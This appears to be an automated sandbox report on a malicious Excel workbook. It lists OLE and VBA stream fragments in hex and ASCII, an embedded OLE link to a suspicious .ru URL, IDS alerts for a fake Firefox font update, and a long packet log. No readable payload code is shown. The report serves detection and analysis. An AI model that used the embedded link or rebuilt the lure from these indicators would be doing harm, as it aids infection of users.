                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . y . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K e n n y C h e u n g . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . m . . . @ . . . . _ ~ . \\ S . @ . . . . . . . . . . . . G . . . x . . . . . . . . 0 . . . . . . . . . . T < . . . . . . . . . . . . . . & .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 79 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 11 00 00 00 c4 00 00 00
                      Stream Path: MBD0077BD89/MBD00320C7F/\x1CompObj, File Type: data, Stream Size: 114
                      General
                      Stream Path:MBD0077BD89/MBD00320C7F/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.219515110876372
                      Base64 Encoded:False
                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: MBD0077BD89/MBD00320C7F/Package, File Type: Microsoft Excel 2007+, Stream Size: 613686
                      General
                      Stream Path:MBD0077BD89/MBD00320C7F/Package
                      CLSID:
                      File Type:Microsoft Excel 2007+
                      Stream Size:613686
                      Entropy:7.989056691241232
                      Base64 Encoded:True
                      Data ASCII:P K . . . . . . . . . . ! . . X . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 1a 58 13 82 c0 01 00 00 90 07 00 00 13 00 bb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 b7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: MBD0077BD89/MBD00321A49/\x1CompObj, File Type: data, Stream Size: 114
                      General
                      Stream Path:MBD0077BD89/MBD00321A49/\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.219515110876372
                      Base64 Encoded:False
                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: MBD0077BD89/MBD00321A49/Package, File Type: Microsoft Excel 2007+, Stream Size: 13665
                      General
                      Stream Path:MBD0077BD89/MBD00321A49/Package
                      CLSID:
                      File Type:Microsoft Excel 2007+
                      Stream Size:13665
                      Entropy:7.1661074658165225
                      Base64 Encoded:True
                      Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 9d a8 db 7e 01 00 00 85 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Stream Path: MBD0077BD89/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 392615
                      General
                      Stream Path:MBD0077BD89/Workbook
                      CLSID:
                      File Type:Applesoft BASIC program data, first line number 16
                      Stream Size:392615
                      Entropy:7.73377528201003
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . h : . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . .
                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Stream Path: MBD0077BD8A/\x1Ole, File Type: data, Stream Size: 766
                      General
                      Stream Path:MBD0077BD8A/\x1Ole
                      CLSID:
                      File Type:data
                      Stream Size:766
                      Entropy:4.395128602979874
                      Base64 Encoded:False
                      Data ASCII:. . . . . F b . 4 . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . k . r . y . x . . . r . u . / . R . N . F . 5 . 2 . o . ? . & . v . e . s . t . m . e . n . t . = . h . a . r . d . & . f . i . r . e . w . a . l . l . = . t . a . s . t . e . l . e . s . s . & . b . r . e . a . d . = . r . a . p . i . d . & . b . e . n . e . f . i . c . i . a . r . y . . . . d E s s . ! y V > k . 1 e K . . . . . . . . . . . . . . . . . . . o . K . i . p . 8 . W . f . 0 . h . w . t . 2 . L . F
                      Data Raw:01 00 00 02 93 0a 46 62 2e dc c7 34 00 00 00 00 00 00 00 00 00 00 00 00 c4 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c0 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6b 00 72 00 79 00 78 00 2e 00 72 00 75 00 2f 00 52 00 4e 00 46 00 35 00 32 00 6f 00 3f 00 26 00 76 00 65 00 73 00 74 00 6d 00 65 00 6e 00 74 00 3d 00 68 00 61 00 72 00 64 00 26 00 66 00 69 00
                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 96259
                      General
                      Stream Path:Workbook
                      CLSID:
                      File Type:Applesoft BASIC program data, first line number 16
                      Stream Size:96259
                      Entropy:7.991524030987595
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . G 3 ] d , a . r . . . 0 ' . 2 ( [ v # f 5 . S d R . . R . . . . . . . . . . . . . . \\ . p . K ! | v _ % X l ; X } H ; _ 1 . + S > l . m q D { . . . . [ * z < P z ^ l W 6 } . . Y . ) . . N . i _ N . . + I y / ^ 8 . d . 3 ] $ . n B . . . k a . . . f D . . . = . . . . " . . . . ( j j @ | j . @ . . . @ . . . . _ . . . . ( . . . . . H . . . . . . . h = . . . S ~ M i r g 5 @ . . . w % . . . " . . . . . . . . . . . . e . . . p ] 1 . . . P | . p G < . s . } 7
                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c8 96 47 f7 f0 33 5d 64 a7 2c 61 a9 07 72 8e a4 06 0c 0f 30 27 b0 da ca 81 b7 32 28 df e8 fb 5b 76 9f d7 23 66 d9 35 18 53 64 52 93 08 c1 00 52 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 18 c3 e2 00 00 00 5c 00 70 00 4b 21 7c c6 76 5f c8 25 58 6c 3b 9a c4 58 7d 48 3b 86 ef fe 5f c3 31 13 2b 53
                      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 531
                      General
                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                      CLSID:
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:531
                      Entropy:5.24079173205235
                      Base64 Encoded:True
                      Data ASCII:I D = " { E 5 D C 6 7 6 2 - E 3 0 F - 4 6 A 4 - 8 0 0 C - D 2 9 7 1 8 2 A 1 A 6 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 C 5 E 9 4 9 F F 4 5 C F 8 5 C F
                      Data Raw:49 44 3d 22 7b 45 35 44 43 36 37 36 32 2d 45 33 30 46 2d 34 36 41 34 2d 38 30 30 43 2d 44 32 39 37 31 38 32 41 31 41 36 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                      General
                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                      CLSID:
                      File Type:data
                      Stream Size:104
                      Entropy:3.0488640812019017
                      Base64 Encoded:False
                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                      CLSID:
                      File Type:data
                      Stream Size:2644
                      Entropy:4.000028931791667
                      Base64 Encoded:False
                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                      CLSID:
                      File Type:data
                      Stream Size:553
                      Entropy:6.379472483054293
                      Base64 Encoded:True
                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 6 i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 8d 36 eb 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2025-03-15T08:45:19.261306+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970113.107.246.60443TCP
                      2025-03-15T08:45:26.598125+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970413.107.246.60443TCP
                      2025-03-15T08:45:26.600057+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970313.107.246.60443TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Mar 15, 2025 08:45:03.088673115 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:03.088711977 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:03.088778019 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:03.089040041 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:03.089051008 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:03.950496912 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:03.950648069 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:03.968142986 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:03.968159914 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:03.968388081 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:03.968453884 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:03.968856096 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:04.012320042 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:04.272965908 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:04.273041010 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:04.273113966 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:04.273147106 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:04.300173044 CET49697443192.168.2.7188.225.72.170
                      Mar 15, 2025 08:45:04.300198078 CET44349697188.225.72.170192.168.2.7
                      Mar 15, 2025 08:45:04.316416979 CET4969880192.168.2.7198.12.89.24
                      Mar 15, 2025 08:45:04.321157932 CET8049698198.12.89.24192.168.2.7
                      Mar 15, 2025 08:45:04.321276903 CET4969880192.168.2.7198.12.89.24
                      Mar 15, 2025 08:45:04.327033043 CET4969880192.168.2.7198.12.89.24
                      Mar 15, 2025 08:45:04.332525969 CET8049698198.12.89.24192.168.2.7
                      Mar 15, 2025 08:45:04.793327093 CET8049698198.12.89.24192.168.2.7
                      Mar 15, 2025 08:45:04.793350935 CET8049698198.12.89.24192.168.2.7
                      Mar 15, 2025 08:45:04.793418884 CET4969880192.168.2.7198.12.89.24
                      Mar 15, 2025 08:45:09.782313108 CET8049698198.12.89.24192.168.2.7
                      Mar 15, 2025 08:45:09.782444000 CET4969880192.168.2.7198.12.89.24
                      Mar 15, 2025 08:45:18.609855890 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:18.609903097 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:18.609996080 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:18.610383034 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:18.610394001 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.261238098 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.261306047 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.262805939 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.262820005 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.263045073 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.264271021 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.304322958 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.365991116 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.366014004 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.366028070 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.366099119 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.366125107 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.366364956 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.457789898 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.457809925 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.457860947 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.457878113 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.457889080 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.457923889 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.460320950 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.460335970 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.460387945 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.460395098 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.460486889 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.541269064 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.541290045 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.541366100 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.541393042 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.541547060 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.556720018 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.556741953 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.556801081 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.556808949 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.556818008 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.556962967 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.556992054 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.556998968 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.557041883 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.557080984 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.629787922 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.629817009 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.629865885 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.629895926 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.629918098 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.630105019 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.630388021 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.630405903 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.630456924 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.630466938 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.630594969 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.635076046 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.635097027 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.635168076 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.635190010 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.635343075 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.635654926 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.635670900 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.635724068 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.635734081 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.635888100 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.636527061 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.636545897 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.636594057 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.636607885 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.637166977 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.637381077 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.637398958 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.637438059 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.637447119 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.637623072 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.638319016 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.638340950 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.638391018 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.638406038 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.638469934 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.718348980 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.718389034 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.718440056 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.718470097 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.718493938 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.718508959 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.718625069 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.718641043 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.718678951 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.718688965 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.718867064 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.719089031 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.719105959 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.719146967 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.719156027 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.719202042 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.723495007 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.723525047 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.723567009 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.723592997 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.723609924 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.723687887 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.723699093 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.723716021 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.723754883 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.723762989 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.724001884 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.724263906 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.724284887 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.724325895 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.724337101 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.724375963 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.724638939 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.724662066 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.724703074 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.724710941 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.724812984 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.724997044 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.725014925 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.725060940 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.725069046 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.725089073 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.725104094 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.807010889 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.807039976 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.807104111 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.807133913 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.807408094 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.807415962 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.807427883 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.807460070 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.807468891 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.807488918 CET49701443192.168.2.713.107.246.60
